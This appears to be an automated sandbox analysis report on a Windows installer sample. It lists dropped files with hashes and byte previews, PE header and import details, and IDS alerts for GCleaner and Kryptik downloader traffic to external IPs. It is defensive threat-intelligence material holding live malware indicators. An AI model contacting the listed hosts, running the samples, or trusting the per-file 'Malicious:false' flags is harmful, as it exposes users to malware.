                                      SHA1:439BAA1B33514FB81632AAF44D16A9378C5664FC
                                      SHA-256:9B8DB510EF42B8ED54A3712636FDA55A4F8CFCD5493E20B74AB00CD4F3979F2D
                                      SHA-512:BFCDCB26B6F0C288838DA7B0D338C2AF63798A2ECE9DCD6BC07B7CADF44477E3D5CFBBA5B72446C61A1ECF74A0BCCC62894EA87A40730CD1D4C2A3E15A7BB55B
                                      Malicious:false
                                      Preview:MZ
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4734
                                      Entropy (8bit):3.240998519166369
                                      Encrypted:false
                                      SSDEEP:96:pwpIiYkXkkXfkuguWj0QGs0Qy0QgF0QXd0Q20QkXKSgVXa2szeuzSzbxGQI5lmCf:pFle+ulCQRoeyOkNR
                                      MD5:1329A040113E3CE278A74FD462C4A271
                                      SHA1:344AD4EDF68B67BC84CB685671C53F6E15A1A9D8
                                      SHA-256:626186FF798A355F206FB1D3D0CA4576DDC256481D208C74D56478064053241D
                                      SHA-512:071D0CA4CE42E2C60911395961E4D14DA07E976C07316E433EABF919F582F21CD4A25DABC13E7344EBBCC0A0D8CDEE72FCCCBBDF76CE20EAB362D8FA0208FE72
                                      Malicious:false
                                      Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.5.9.2. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.3.4.8.7.2.6. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Users\user\AppData\Local\Temp\09xU.exE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):237058
                                      Entropy (8bit):6.878798551986205
                                      Encrypted:false
                                      SSDEEP:6144:RvgEu4Usp79TKBSPFGJoqLZ+hdN1i/JlV6Ke22E:BAkB9pPFOcoJJ
                                      MD5:973C9CF42285AE79A7A0766A1E70DEF4
                                      SHA1:4AB15952CBC69555102F42E290AE87D1D778C418
                                      SHA-256:7163BFAAAA7ADB44E4C272A5480FBD81871412D0DD3ED07A92E0829E68EC2968
                                      SHA-512:1A062774D3D86C0455F0018F373F9128597B676DEAD81B1799D2C2F4F2741D32B403027849761251F8389D248466BCD66836E0952675ADCD109CC0E950EAEC85
                                      Malicious:false
                                      Preview:.`.^..i..e.r.F.B.P`...&.{.6./...)~33.]..h...^..I.E`.........................................<..U..{..&..^.,-P7..3Q...S(.U.W...L.-..pW..W.tJ.1..N04Ut....R?..'.ES......bS...jB.p.........Q.k..H...TZ'...AU@..\.t/..HD...9L.........................................c/.....:..zP.m[."RFs(....n..H^.#..$.p...n^.S....B.......p...*..Ea.h....0..[E.~mM.F.Y.9.=.n +n..$......:..k*.....It:T....G.:W.c...[..V.........................................C.FU..G..fc."Z...F.{..G...0$...7P.T.-.....3*.P....G..TT;..M.f..~B-&3..+...V>s....'.E.c.[....Y?....`..F...N]..`....q.2..X.q.........................................|C&..A...c]..2.......,}?.^j..K..o......IL.Jp.+c?...0..i.:..-:..MU...Y..!T....XI......PJ...K~.....'+n.8...A<.Y!n.v.4E......!%7i.........................................`..T.#.....%Ws[!.q...f U....<.+}..#..a.W|.5.......}.....'"..XL....n...L.p0.}kja..7..z.s..2.^..S..D .U.~$.NI..;...5......*.^...9...........................................K...0.C...{g{...+.P.6....bS......'_
                                      Process:C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):3533154
                                      Entropy (8bit):7.990933339216253
                                      Encrypted:true
                                      SSDEEP:98304:DsCvLUBsg8IAEVN9nlglKZlLyCBk0v4W7W4YUMw8MB:DxLUCg57LyCBkYW43RRB
                                      MD5:0DB8584A650C251CC2BA26F73DADC3DC
                                      SHA1:CCE2D23884DC2F50FDB230DAEF54166124D503CE
                                      SHA-256:B559E35B8069E6858E710B1774213FED76ED4F1ACB4B74901F0F6F8FC33E9C9B
                                      SHA-512:3F5E67ED270C0290064B01BBC8123373E5B76BC36F8B42B531DFC93701A151C09E374AEED404DFD70D67DD0128576FC1141A12FE22F5BBD22A337631444E8DE1
                                      Malicious:false
                                      Preview:........,.......,.......\...................................................................................................................................................................................................................................................................G...................J...................u...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1350528
                                      Entropy (8bit):7.079863710734355
                                      Encrypted:false
                                      SSDEEP:24576:E1uoD1R9FlL8BKb3kL5OHJ988GgwMdzvFRG1:E1cKIklG/Mdv
                                      MD5:BD3523387B577979A0D86FF911F97F8B
                                      SHA1:1F90298142A27EC55118317EE63609664BCECB45
                                      SHA-256:A7E608F98F06260044D545F7279B8F859F7B7AF98AC2B2B79A3CD7AC3B2DAC36
                                      SHA-512:B37CB8DADDB526312F6BE439A3CB87FE62B69D44866DF708F10EB148455F09F90B0DCEE4360C1AE332D3936357FD4C474920AEBEC5AA8DDB005B617356C3D286
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 74%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....sB*..........................................@.............................................................................. ...p...H...........x...#.......b..................................................................................CODE....d........................... ..`DATA....P...........................@...BSS......................................idata... ......."..................@....reloc...b.......d..................@..P.rsrc....H...p...H...0..............@..P................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3527334
                                      Entropy (8bit):7.993086132744028
                                      Encrypted:true
                                      SSDEEP:98304:xsCvLUBsg8IAEVN9nlglKZlLyCBk0v4W7W4YUMw8MB:xxLUCg57LyCBkYW43RRB
                                      MD5:264FBE02A8ACAE2BA9A5144F8B947AAE
                                      SHA1:3DE9E174BB8105895C3EF65FE49233CBB34B8778
                                      SHA-256:AB3F08D6CFE4107EF0A285CE7862846169EC0E0F942B146E27E90919E48F9E24
                                      SHA-512:11E0A03EB5004159A1C7DC84BB52CAA7394740B87E375CE2BE0701BD8B12445AF01EE22AC7F9C91516B53CFCA7E13619623524122D489E34946038732A2FE067
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 68%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#.B...B...B...]...B...^...B...]...B...]...B...J...B...B...B...J...B...d...B...d...B....6..B.......B..]D...B..Rich.B..................PE..L.....n\........../..........n....................@..........................@..................................................x....0...............................................................................................................text...E........................... ..`.rdata...:.......<..................@..@.data....#..........................@....sxdata...... ......................@....rsrc........0......................@..@................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\09xU.exE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):498126
                                      Entropy (8bit):6.914893220137858
                                      Encrypted:false
                                      SSDEEP:6144:SeaGiJH+//KQsQqaizLQBwNPJj1OO028UHFdjXEEx4mJarZ7AMvl:6wO1dLQEvOO03K7GmEN7b
                                      MD5:7B25B2318E896FA8F9A99F635C146C9B
                                      SHA1:10F39C3EDB37B848974DA0F9C1A5BAA7D7F28EE2
                                      SHA-256:723B3B726B9A7394AC3334DF124A2033536B108A8EB87EC69E0A6E022C7DCD89
                                      SHA-512:A3B294E93E9D0A199AF21AD50AF8290C0E0AAA7487019480CA3FFD75AA8AD51C4D33612EC69275E4FA2273CA5E33FDFDF263BB0CE81AD43CE092147118FA8CA6
                                      Malicious:false
                                      Preview:....7..o|..:=g..Fg....Q.x6....fCTCY.-.C.._x...|..3.......:YO....s.+].1.%{.rMt K.N...T..o'.+.r?>`S.P..n....Ud.uM......U{.o........F[..........................................".7.i}...].<[.H..uj.i.r.Y..._E.:.2..C./,.&F..<;...w.........9YEc<d...q$3.S;<...s.V.08,..]d$.G8...:Yt.).y.B..a#.3)...aE......r.#............................................k.P.V.O..9.z...y......u..CL..;.'.;.. .}.N...g.m.\...G5P....^..o.....].^.....f...b.S=...+..ai.0r..L(g..)....3j...R....R0.kf.c...........................................k.L.._...I>...^..~~......V...uS..+5..a.8...R'.V.B......C..R.AK2<]9.O...A=...N.s..\;F.N$.,.qi.\.^.7..6o~q.G?.#..Z.|..Q.5...}..S>y.Y...........................................;.M.t..H.u...2..w..Xx.SF..4.0....6~...u.[..^{...Sp#.)..n? {......\...3.....Y..c.@Je..K"....lW.q.2.0\k......\/...h.I}.@".Mr6..........................................j.M.e...9....n*.t..T...g.wk...\.S)p....v.j....M.I@x........V..y..#s.......{.0..l..]O>,.....f.Z=`..b...+j,..^.I&.}l2.x.
                                      Process:C:\Windows\explorer.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):348672
                                      Entropy (8bit):6.015664208947374
                                      Encrypted:false
                                      SSDEEP:6144:IQ31DWvFRu0pIIC6nVm6j4qYmSkF/bzOdzzJIlt+MSq:9DWvSIvVNMqYmSkF/CzNIls
                                      MD5:BE60D71B303F2AAE5618315147C7D3F9
                                      SHA1:3193AA204C2CF5A82AC532AB9FD436ACAD7953C1
                                      SHA-256:E4BA726FBD2C56CD2426BA04823637264BE89A9807A935D0939DC1578BDD951E
                                      SHA-512:2C15B655B0CC12EB7BD5329A922DBDBA6F226748F45D03C777980CCE79A841C28A1D9DC1283D0A5C361E4EBD537F2BA4C1B44F59D3A5FAF132EAE48F1F884A77
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2&.tvG.'vG.'vG.'.1Q'mG.'.1d'DG.'.1e'.G.'.?\'sG.'vG.'.G.'.1`'wG.'.1U'wG.'.1R'wG.'RichvG.'................PE..L......^......................(.....`.............@...........................,.................................................<.....+..s....................+.....0...................................@............................................text............................... ..`.data...P-'.........................@....rsrc....s....+..t..................@..@.reloc........+......b..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):55
                                      Entropy (8bit):4.306461250274409
                                      Encrypted:false
                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                      Malicious:false
                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:MS Windows registry file, NT/2000 or above
                                      Category:dropped
                                      Size (bytes):1835008
                                      Entropy (8bit):4.471393510110413
                                      Encrypted:false
                                      SSDEEP:6144:3IXfpi67eLPU9skLmb0b48WSPKaJG8nAgejZMMhA2gX4WABl0uNkdwBCswSbh:4XD948WlLZMM6YFHK+h
                                      MD5:FFFF2E80E7F8BEC9AE5265F6BE0893D9
                                      SHA1:6852DF8CD5F95C9A0ED476DD8C91775A94BC64CE
                                      SHA-256:F5C4DF628D36EB32238093B9F0030F8686D615C8B2B63931576B3C0594A27921
                                      SHA-512:089A853B42C6C2ACF27B70D3D3C28BA392AFF634827DD53EB776976A5D3D4575ABE5EC3CA8EA827696B978E65AEA14693773DF77E4A28149256B998A68DB0292
                                      Malicious:false
                                      Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.1A...................................................................................................................................................................................................................................................................................................................................................V-........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):7.999019779316821
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe
                                      File size:3'545'603 bytes
                                      MD5:efa310ffcb46aa3768de9aae3a8fdcda
                                      SHA1:fc57edeadc23e53610eb75881fc7d2cecc847387
                                      SHA256:abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb6bd2120da1c01fb1a5a
                                      SHA512:22578db72219ab2d80876d025475d74ec05db4a575d0b5c890033bb7cda9bcbf648217e6d140388643280802566b4fc4c77cd78f01d9d3f28b5594c2e406432d
                                      SSDEEP:98304:JDxSfQksG3P/rm5AUfWo7lvZTkKXUx5KyChc2tpi:JDkQbCK5Qo7lviyUocypi
                                      TLSH:00F53305CBC496BBCD369039F52FA14047521F7F2EF5F6264F208BAA7926E5742A42F0
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....$_.................f...*.....
                                      Icon Hash:3d2e0f95332b3399
                                      Entrypoint:0x4035d8
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x5F24D702 [Sat Aug 1 02:44:18 2020 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:c05041e01f84e1ccca9c4451f3b6a383
                                      Instruction
                                      sub esp, 000002D4h
                                      push ebx
                                      push esi
                                      push edi
                                      push 00000020h
                                      pop edi
                                      xor ebx, ebx
                                      push 00008001h
                                      mov dword ptr [esp+14h], ebx
                                      mov dword ptr [esp+10h], 0040A230h
                                      mov dword ptr [esp+1Ch], ebx
                                      call dword ptr [004080C8h]
                                      call dword ptr [004080CCh]
                                      and eax, BFFFFFFFh
                                      cmp ax, 00000006h
                                      mov dword ptr [0042A26Ch], eax
                                      je 00007F009C9E6D43h
                                      push ebx
                                      call 00007F009C9EA049h
                                      cmp eax, ebx
                                      je 00007F009C9E6D39h
                                      push 00000C00h
                                      call eax
                                      mov esi, 004082B0h
                                      push esi
                                      call 00007F009C9E9FC3h
                                      push esi
                                      call dword ptr [00408154h]
                                      lea esi, dword ptr [esi+eax+01h]
                                      cmp byte ptr [esi], 00000000h
                                      jne 00007F009C9E6D1Ch
                                      push 0000000Bh
                                      call 00007F009C9EA01Ch
                                      push 00000009h
                                      call 00007F009C9EA015h
                                      push 00000007h
                                      mov dword ptr [0042A264h], eax
                                      call 00007F009C9EA009h
                                      cmp eax, ebx
                                      je 00007F009C9E6D41h
                                      push 0000001Eh
                                      call eax
                                      test eax, eax
                                      je 00007F009C9E6D39h
                                      or byte ptr [0042A26Fh], 00000040h
                                      push ebp
                                      call dword ptr [00408038h]
                                      push ebx
                                      call dword ptr [00408298h]
                                      mov dword ptr [0042A338h], eax
                                      push ebx
                                      lea eax, dword ptr [esp+34h]
                                      push 000002B4h
                                      push eax
                                      push ebx
                                      push 00421708h
                                      call dword ptr [0040818Ch]
                                      push 0040A384h
                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3b000 | 0xa60 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6572 | 0x6600 | 869e1d11bbf88d92521c022fa6f3d4f0 | False | 0.6623008578431373 | data | 6.453919385955138 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1398 | 0x1400 | 79e286249499b713a2ddbee33baa50da | False | 0.449609375 | data | 5.1367175827370986 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x20378 | 0x600 | b6d02c867f7bfbcf68de2cfeea94fd73 | False | 0.5078125 | data | 4.096809083627214 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2b000 | 0x10000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3b000 | 0xa60 | 0xc00 | ee5366c0b6c3ce68a7cd0901528e1abe | False | 0.4049479166666667 | data | 4.20968703407114 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x3b190 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.42473118279569894
RT_DIALOG | 0x3b478 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x3b578 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x3b698 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x3b6f8 | 0x14 | data | English | United States | 1.2
RT_MANIFEST | 0x3b710 | 0x34b | XML 1.0 document, ASCII text, with very long lines (843), with no line terminators | English | United States | 0.5527876631079478
DLL | Import
ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
2024-08-21T10:57:16.929515+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 59942 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T10:59:33.745707+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 60050 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T11:00:41.398811+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 60100 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T10:59:18.602448+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60036 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:18.602448+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60036 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:58:30.595516+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 60004 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T11:00:11.667367+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60076 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:11.667367+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60076 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:26.633655+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60043 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:26.633655+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60043 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:57:33.894339+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 59969 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T11:00:07.577839+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 60075 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T11:00:01.948773+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 60071 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T10:57:45.127471+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 59975 | 443 | 192.168.2.4 | 162.159.130.233
